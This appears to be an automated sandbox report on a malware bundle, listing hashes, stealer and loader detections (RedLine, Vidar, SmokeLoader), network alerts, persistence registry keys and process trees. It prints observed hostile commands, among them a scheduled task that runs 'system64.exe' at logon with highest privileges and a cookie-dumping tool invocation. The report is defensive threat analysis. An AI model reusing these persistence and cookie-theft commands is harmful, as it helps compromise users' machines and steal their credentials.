C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

memory/1548-189-0x0000000001330000-0x0000000001331000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

memory/1740-191-0x0000000000140000-0x0000000000141000-memory.dmp

memory/432-182-0x0000000000400000-0x00000000008EB000-memory.dmp

memory/1740-177-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe

MD5 6e61e25e7dc311d34b4a37e9c42d4079
SHA1 f623f0c66d599a12677cabcb0140034b5cf969bf
SHA256 55366854ece30f35d98d54b9fdfd48b0c4482bdfd4aacb59c78ccde8ce89bd9d
SHA512 da2f50a9139bcaa89680d939b905187574d2b84b89436f570c2e218680dad5c3d880cfc9e434f26c059d6602a334f2488afae4e9b92fcdc022928164400b7314

memory/1548-178-0x0000000000000000-mapping.dmp

memory/1740-192-0x0000000000150000-0x0000000000173000-memory.dmp

memory/1736-175-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp

memory/1740-193-0x0000000000180000-0x0000000000181000-memory.dmp

memory/1740-194-0x000000001B060000-0x000000001B062000-memory.dmp

memory/1808-170-0x000000013FEC0000-0x000000013FEC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

MD5 1eba952dd3974898cd98fbc8807b6929
SHA1 963289ab1f6af6b34fc596bb0464947e230db350
SHA256 6725aa9db031f924217cc47b78f53f03aafa329eb15906a910f21abc05116315
SHA512 18a23964951d6ba123f92b53cef1e70f4840803675c884ae4f128e55eecb6667ad456b164ca9ff47eaf01256ad0d46de69c520b16ab5af58175c13e759c20397

C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

MD5 1eba952dd3974898cd98fbc8807b6929
SHA1 963289ab1f6af6b34fc596bb0464947e230db350
SHA256 6725aa9db031f924217cc47b78f53f03aafa329eb15906a910f21abc05116315
SHA512 18a23964951d6ba123f92b53cef1e70f4840803675c884ae4f128e55eecb6667ad456b164ca9ff47eaf01256ad0d46de69c520b16ab5af58175c13e759c20397

\Users\Admin\AppData\Local\Temp\Install2.EXE

MD5 ab5eae79062ddedb6715c265dddd9044
SHA1 254a9f7bd992f0e2dd1c33dc03db60050402df84
SHA256 8a87cc9fab38ab661ed147f2b39b85582e9ee7671006780f528d6fddb377f75f
SHA512 28e2568646d8a103e138a0f5bc15a785aeb6b41f87c30be9db556c4baf58a25902bb94cb72d861cbfc24f3829342d50ce891e0637ccd04ac9252abe60b33ab4d

memory/1548-195-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

memory/1808-196-0x000000001B970000-0x000000001B972000-memory.dmp

memory/1808-197-0x0000000000550000-0x000000000055A000-memory.dmp

memory/1660-198-0x0000000000000000-mapping.dmp

memory/1648-199-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

memory/1900-202-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\system64.exe

MD5 1eba952dd3974898cd98fbc8807b6929
SHA1 963289ab1f6af6b34fc596bb0464947e230db350
SHA256 6725aa9db031f924217cc47b78f53f03aafa329eb15906a910f21abc05116315
SHA512 18a23964951d6ba123f92b53cef1e70f4840803675c884ae4f128e55eecb6667ad456b164ca9ff47eaf01256ad0d46de69c520b16ab5af58175c13e759c20397

memory/1900-203-0x000000013F260000-0x000000013F261000-memory.dmp

memory/1556-206-0x0000000000417E02-mapping.dmp

memory/1556-205-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1924-210-0x0000000000000000-mapping.dmp

memory/1724-213-0x0000000000000000-mapping.dmp

memory/1572-214-0x0000000000000000-mapping.dmp

memory/1500-211-0x0000000000000000-mapping.dmp

memory/1900-209-0x000000001B720000-0x000000001B722000-memory.dmp

memory/2076-215-0x0000000000000000-mapping.dmp

memory/2156-217-0x0000000000000000-mapping.dmp

memory/2192-218-0x0000000000000000-mapping.dmp

memory/2304-220-0x0000000000000000-mapping.dmp

memory/2392-222-0x0000000000000000-mapping.dmp

memory/2448-224-0x0000000000000000-mapping.dmp

memory/2592-226-0x0000000000000000-mapping.dmp

memory/2628-228-0x0000000000000000-mapping.dmp

memory/2684-234-0x0000000000000000-mapping.dmp

memory/2764-235-0x0000000000000000-mapping.dmp

memory/2744-233-0x0000000000000000-mapping.dmp

memory/2704-231-0x0000000000000000-mapping.dmp

memory/2696-230-0x0000000000000000-mapping.dmp

memory/2800-238-0x0000000000000000-mapping.dmp

memory/2812-239-0x0000000000000000-mapping.dmp

memory/2824-240-0x0000000000000000-mapping.dmp

memory/2780-236-0x0000000000000000-mapping.dmp

memory/2732-232-0x0000000000000000-mapping.dmp

memory/2876-247-0x0000000000000000-mapping.dmp

memory/2844-242-0x0000000000000000-mapping.dmp

memory/2928-251-0x0000000000000000-mapping.dmp

memory/2920-250-0x0000000000000000-mapping.dmp

memory/2140-262-0x0000000000000000-mapping.dmp

memory/240-260-0x0000000000000000-mapping.dmp

memory/632-258-0x0000000000000000-mapping.dmp

memory/2844-268-0x0000000004550000-0x0000000004551000-memory.dmp

memory/2016-261-0x0000000000000000-mapping.dmp

memory/2024-259-0x0000000000000000-mapping.dmp

memory/1428-269-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-22 23:31

Reported

2021-07-22 23:33

Platform

win10v20210410

Max time kernel

6s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rUNdlL32.eXe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

suricata: ET MALWARE GCleaner Downloader Activity M1

suricata

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata

suricata: ET MALWARE Win32/Ficker Stealer Activity M3

suricata

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Cryptocurrency Miner

miner

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\Install2.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\Install2.EXE N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3244 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe
PID 3244 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe
PID 3244 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe
PID 2620 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3696 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.exe
PID 3696 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.exe
PID 3696 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.exe
PID 4076 wrote to memory of 3092 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.exe
PID 4076 wrote to memory of 3092 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.exe
PID 3104 wrote to memory of 1192 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe
PID 3104 wrote to memory of 1192 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe
PID 3104 wrote to memory of 1192 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe
PID 3224 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe
PID 3224 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe
PID 3224 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe
PID 3952 wrote to memory of 2124 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.exe
PID 3952 wrote to memory of 2124 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.exe
PID 3952 wrote to memory of 2124 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.exe
PID 2356 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_4.exe
PID 2356 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_4.exe
PID 372 wrote to memory of 812 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_6.exe
PID 372 wrote to memory of 812 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_6.exe
PID 372 wrote to memory of 812 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_6.exe
PID 3852 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe
PID 3852 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe
PID 3852 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe
PID 1192 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe C:\Users\Admin\AppData\Local\Temp\Chrome2.exe
PID 1192 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe C:\Users\Admin\AppData\Local\Temp\Chrome2.exe
PID 2976 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe
PID 2976 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe
PID 2976 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe
PID 1192 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe C:\Users\Admin\AppData\Local\Temp\Install2.EXE
PID 1192 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe C:\Users\Admin\AppData\Local\Temp\Install2.EXE
PID 1192 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe
PID 1192 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe
PID 2904 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\Install2.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
PID 2904 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\Install2.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
PID 2904 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\Install2.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
PID 1864 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 1864 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 1864 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe

"C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.exe

sonia_2.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.exe

sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.exe

sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_4.exe

sonia_4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_6.exe

sonia_6.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe

sonia_1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe" -a

C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\Install2.EXE

"C:\Users\Admin\AppData\Local\Temp\Install2.EXE"

C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe

"C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe

sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe

sonia_8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_2.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\system32\rUNdlL32.eXe

rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main

C:\Windows\SysWOW64\rundll32.exe

rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Users\Admin\AppData\Local\Temp\askinstall54.exe

"C:\Users\Admin\AppData\Local\Temp\askinstall54.exe"

C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe

"C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\pub1.exe

"C:\Users\Admin\AppData\Local\Temp\pub1.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe

C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS47EC.tmp\Install.cmd" "

C:\Users\Admin\AppData\Roaming\system64.exe

"C:\Users\Admin\AppData\Roaming\system64.exe"

C:\Users\Admin\Documents\0KP102jSxIfodbztguukb0UO.exe

"C:\Users\Admin\Documents\0KP102jSxIfodbztguukb0UO.exe"

C:\Users\Admin\Documents\R6fLTGUWTxnOaRl3lzzm6L0q.exe

"C:\Users\Admin\Documents\R6fLTGUWTxnOaRl3lzzm6L0q.exe"

C:\Users\Admin\Documents\NXe1_S23sqOurzWYRdTMPYHZ.exe

"C:\Users\Admin\Documents\NXe1_S23sqOurzWYRdTMPYHZ.exe"

C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe

"C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe"

C:\Users\Admin\Documents\7Y4wgnMMaR3q65GXhGbUCfdp.exe

"C:\Users\Admin\Documents\7Y4wgnMMaR3q65GXhGbUCfdp.exe"

C:\Users\Admin\Documents\ZkB3ER98azKx0Ea9mL5XyFpY.exe

"C:\Users\Admin\Documents\ZkB3ER98azKx0Ea9mL5XyFpY.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'

C:\Users\Admin\Documents\BfNWgdMHfj8X1vBRorcQ0KnE.exe

"C:\Users\Admin\Documents\BfNWgdMHfj8X1vBRorcQ0KnE.exe"

C:\Users\Admin\Documents\xCZ4etkup7sdvkCcWCLUCqQK.exe

"C:\Users\Admin\Documents\xCZ4etkup7sdvkCcWCLUCqQK.exe"

C:\Users\Admin\Documents\jRt1TQVGU9skoXxsd4io9d0X.exe

"C:\Users\Admin\Documents\jRt1TQVGU9skoXxsd4io9d0X.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 812

C:\Users\Admin\Documents\MOPm2aWllbKWPINFLmw1q6Bb.exe

"C:\Users\Admin\Documents\MOPm2aWllbKWPINFLmw1q6Bb.exe"

C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe

"C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe"

C:\Users\Admin\Documents\kJA_LxHro_HNkQwCmmu_OarH.exe

"C:\Users\Admin\Documents\kJA_LxHro_HNkQwCmmu_OarH.exe"

C:\Users\Admin\Documents\DKtQCHXhQxQaZznr5jVn2orU.exe

"C:\Users\Admin\Documents\DKtQCHXhQxQaZznr5jVn2orU.exe"

C:\Users\Admin\Documents\biX4hee48umM0gNqF7fn_vOZ.exe

"C:\Users\Admin\Documents\biX4hee48umM0gNqF7fn_vOZ.exe"

C:\Users\Admin\Documents\EfnLljmSkZc_7o5rt6klWdGN.exe

"C:\Users\Admin\Documents\EfnLljmSkZc_7o5rt6klWdGN.exe"

C:\Users\Admin\Documents\8SSNV3Yak9vApQeqMDfWq0Q5.exe

"C:\Users\Admin\Documents\8SSNV3Yak9vApQeqMDfWq0Q5.exe"

C:\Users\Admin\Documents\5Lde95vLslywRqqA6Y06YyjF.exe

"C:\Users\Admin\Documents\5Lde95vLslywRqqA6Y06YyjF.exe"

C:\Users\Admin\Documents\A3ygo1rZYNvgHnO3hO9e_eOM.exe

"C:\Users\Admin\Documents\A3ygo1rZYNvgHnO3hO9e_eOM.exe"

C:\Users\Admin\Documents\biRtj61UfpoGm7HHHdacryQC.exe

"C:\Users\Admin\Documents\biRtj61UfpoGm7HHHdacryQC.exe"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

